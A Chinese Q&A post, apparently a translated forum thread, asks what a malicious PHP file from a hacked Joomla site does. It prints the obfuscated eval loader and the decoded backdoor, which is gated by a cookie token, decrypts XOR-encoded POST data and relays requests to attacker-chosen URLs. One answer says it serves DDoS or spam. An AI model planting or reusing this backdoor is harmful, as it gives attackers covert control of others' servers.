在被黑的Joomla网站中找到奇怪的文件

时间:2016-02-17 08:17:47

标签: php joomla

我的朋友今天将他的Joomla网站黑了,我收到了这个文件,说这是罪魁祸首。

<?php
function uxqdz($zezy, $rwsw){$pdnpgtd = ''; for($i=0; $i < strlen($zezy); $i++){$pdnpgtd .= isset($rwsw[$zezy[$i]]) ? $rwsw[$zezy[$i]] : $zezy[$i];}
$q="base64_decode";return $q($pdnpgtd);}

$llwes = '4osVIObTD84Zy36FtLuMf8scD8yKrLyTyKmmJAMCziuFr7sct3OGJzkMr3kcD8yKrLyTyK'.
'mmJAMCziustHy5tsbKD8u5tH6Fr7tZ0zivS4Fht3OG8L6Fr9OcrosQI84Z0zivS4FhI9kVrLys8LOTD8'.
'ycf9y5tH4Z0BivS4FhI9aF8LCskzYHr9en83OnD9C1kos5rsbGI91syKmmJAMCzYGJD7bKD9eNIzhZyebSAGbR'.
'BqqYf80YyosGD9GFS4FvS4ZYjzhYI9fYJz6FkoOQjzpbjzyNDNeiCSfnDzGTD9ysRA4GCoqQf94LfKGmXSp1CoyiCoC70o0xJ'.
'4GJjzhYjzhYjzusgosGJzivS4FbS4ZCzx6if862jSGYD7sMDObHD86cf3bVkoOVkP0ZyLu'.
'ZtSZ5R3sVtPOGyKivS4ZiDoeGfBhbjPCmrosGJzjbjxmiDoeGfBmKJAMCzYGJyoj3CebiD9C5DoOcDoeGfBhbjoy2t3q3CebiD9'.
'C5DoqZk8yMDoONr36sJz6if8629TekJBivS4ZCzx6TD9ai8362kopYwBu1rHCst7'.
's2rosdDB2iD9CKg8uGJz6xCN6cDoONr36s8362kopFJAMCzYGJy'.
'PystLOMkzhbjPCsr76cDoeGfApYJz6TD9ai8362kopFXmGJS4FFDxhZjB6KD8C1rP4FS4FvS4ZYjz'.
'hYyPystLOMkzhbjPCsr76cDoeGfAjZyPCsr76cDoeGfBivS4FbS4ZCz7ONIoWYyPystLOMkSMCzYGJDHO'.
'VfL6Fr3nYDoONtHsmkzYiDoeGfBiCzHMCzxhYjzhirLOG8362ko'.
'pYwBhxjNMCzxhYjzhiI3OajSGYyebA6Oy96OyryG2qOeucBpbAOzkk'.
'jznYyebA6Oy96Oyry1yeqOOeq16cOOyyy1GvS4ZYjzhYyoQsgObMD9nYwBuTkPyMD9nZyoQsg'.
'BivS4ZYS4ZYjzhYD7bKjzYiIAGmXKhiIBhWjPCGt7EsrxYiI3OaJAMYyoilJKiCzxhYjzuvS4ZYjzhYjzhYjz6lD8sryos'.
'kjSGYf32KJobKDzYiI3Oa9K6F8BiY8xhZyoQsgObMD9nYyBhKCAqFJAMCzxhYjzubS4ZCzxh'.
'Yjzu7rLjYJz6FwAhvjz6FwPCGt7EsrxYiDoeGfBivJ4GJjzhYjPMCzxhYjzhYjzhYD7bKjzYiIN'.
'GmXKhiINETkPyMD9nZyoQsgBiYyxfYyoiWtL6KroOVJz6if862JAMYyoZlJKmYyoilJKiCzxhYjzhYjzhYg'.
'mGJjzhYjzhYjzhYjzhYyob1kebif862jznbjoCZtx25t74Zyo62koeryoskJBugjobKDzYiI3Oa9K6U8BiFXmGJjzhYjzhYjzu'.
'bS4ZYjzhYc4GJS4ZYjzhYt7OGk8yVjz65k86cDoeGfAMCzHGCzYGJDHOVfL6Fr3nYt3OVDebif8'.
'620BYiDoeGfBiCzHMCzxhYjzhiIoO2DzhbjzjxXmGJS4ZYjzhYD7bKD9eNIzYiDoeGfOMxIoO2DoOKtKykjoeTjz6lD8ibw'.
'x63f9E1DBiCzxhYjzuvS4ZYjzhYjzhYjz6ZD9eijznbjz6lD8iYRxhxXxhxjznYyPD2rPOsjznYjsEK8onxXmGJjzh'.
'YjPGCzYGJjzhYjz6mf8y2r80YwBu2tHy2gBYHIP6GtztYwAnYf8yKf8iZS4ZYjzhYjzhYjzk'.
'QD86Zr34HjSG+jz6if8629KyQD86Zr34x8BmCzxhYjzhYjzhYy32sf96s'.
'txtYwAnYyo2sf94MS4ZYjzhYjzhYjzkNr3aGD9aGyKhbwxhiDoeGfOMx'.
'f7bigBykRhGJjzhYjzhYjzhHkosQD9b1kztYwAnYyo62koerjH6Fr9O5k84x8BmCzxhYjzhYj'.
'zhYS4ZYjzhYJBivS4ZCzxhYjzhifL6njSGYtL6KD9eQ83C5rH6sgP6cfLysf86sJz6mf8y2r80FXmGJjzhYjhGJjzhYjz6KD8C'.
'1rP4YwBuhD7sMDObHD86cf3bVkoOVkP0Zyo62koerjHOKrzykRzuo4qEA6BmYyoCGgzivS4ZCzxhYjzuFDxhZyo2'.
'GkPuct7OTtobVt3OcIoO2DoOKJ4GJjzhYjPMCzxhYjzhYjzhYI9fYJP'.
'CGtHu5tKYiIP6GtebKD8Cmr3aTDObZD9eiD8yr0eGMjzjK0ShxJBhbwAGY6ie'.
'0qGqFS4ZYjzhYjzhYjPMCzxhYjzhYjzhYjzhYjz6KD8C1rP4YwBhxBe6qqebeqsywqsEGjxhVjz6ZkP6m'.
'8LystLu5rHCs832sf96stsMm8AMCzxhYjzhYjzhYc4GJjzhYjPGCzxhYjzusrPCsS4ZY'.
'jzhYgmGJjzhYjzhYjzhit7OTk9EGjSGYjiCwAiae416yAGac6OyBA1j'.
'xXmGJjzhYjPGCzYGJjzhYjPyskPOKrxhit7OTk9EGXmGJc4GJS4F7k9aNkos5rxuTD9ai8362kopKJz6if862J4GJgmGJjz'.
'hYjzW5jPOTDBuTr3ClD86TS4Fb';

$eqjbe = Array('1'=>'1', '0'=>'M', '3'=>'2', '2'=>'h', '5'=>'v', '4'=>'Q', '7'=>'m', '6'=>'R', '9'=>'W', '8'=>'X', 'A'=>'T', 'C'=>'N', 'B'=>'S', 'E'=>'x', 'D'=>'Z', 'G'=>'0', 'F'=>'p', 'I'=>'a', 'H'=>'n', 'K'=>'y', 'J'=>'K', 'M'=>'s', 'L'=>'3', 'O'=>'V', 'N'=>'j', 'Q'=>'t', 'P'=>'H', 'S'=>'D', 'R'=>'L', 'U'=>'q', 'T'=>'z', 'W'=>'8', 'V'=>'u', 'Y'=>'g', 'X'=>'O', 'Z'=>'o', 'a'=>'5', 'c'=>'f', 'b'=>'9', 'e'=>'F', 'd'=>'6', 'g'=>'e', 'f'=>'Y', 'i'=>'k', 'h'=>'A', 'k'=>'d', 'j'=>'I', 'm'=>'w', 'l'=>'r', 'o'=>'G', 'n'=>'4', 'q'=>'U', 'p'=>'E', 's'=>'l', 'r'=>'b', 'u'=>'B', 't'=>'c', 'w'=>'P', 'v'=>'7', 'y'=>'J', 'x'=>'i', 'z'=>'C');

eval(uxqdz($llwes, $eqjbe));?>

我通过取出eval并回显返回值来解密字符串,这是正在评估的脚本。

@ini_set('display_errors',0);
@ini_set('log_errors',0);
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);

foreach ($_COOKIE as $item)
{
    if ($item != "cf1d468d-3ebe-444e-ad7c-08154bd4cf0c")
        exit();
}

$data = file_get_contents('php://input');
$data = split("=",$data,2);

$b64_decode_data = base64_decode(urldecode($data[1]));

$send_data = unserialize(decrypt($b64_decode_data));

$result = send_data1 ($send_data);

if (!$result)
{
    $result = send_data2($send_data);
}

echo $result;

function decrypt($data)
{
    $out_data = "";
    $key = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    $key_len = strlen($key);

    for ($i=0; $i < strlen($key); $i++)
    {
        $key[$i] = chr(ord($key[$i]) ^ ($key_len % 255));
    }

    for ($i=0; $i<strlen($data);)
    {
        for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
        {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }

    return $out_data;
}

function send_data1($data)
{
    $head = "";

    foreach($data["headers"] as $key=>$value)
    {
        $head .= $key . ": " . $value . "\r\n";
    }

    $params = array('http' => array(
        'method' => $data["method"],
        'header' => $head,
        'content' => $data["body"],
        'timeout' => $data["timeout"],

    ));

    $ctx = stream_context_create($params);

    $result = @file_get_contents($data["url"], FALSE, $ctx);

    if ($http_response_header)
    {
        if (strpos($http_response_header[0], "200") === FALSE)
        {
            $result = "HTTP_ERROR\t" . $http_response_header[0];
        }
    }
    else
    {
        $result = "CONNECTION_ERROR";
    }

    return $result;
}

function send_data2($data)
{
    // use sockets
}

它看起来像文件上传脚本,但我不确定它是如何工作的。

可以解释一下这是什么吗?

非常感谢

1 个答案:

答案 0 :(得分:0)

黑客将使用该代码通过网址请求从远程服务器请求您的服务器。黑客需要他ping服务器的示例:http://your.server.com/x.php

这项工作通常用于DDos或垃圾邮件。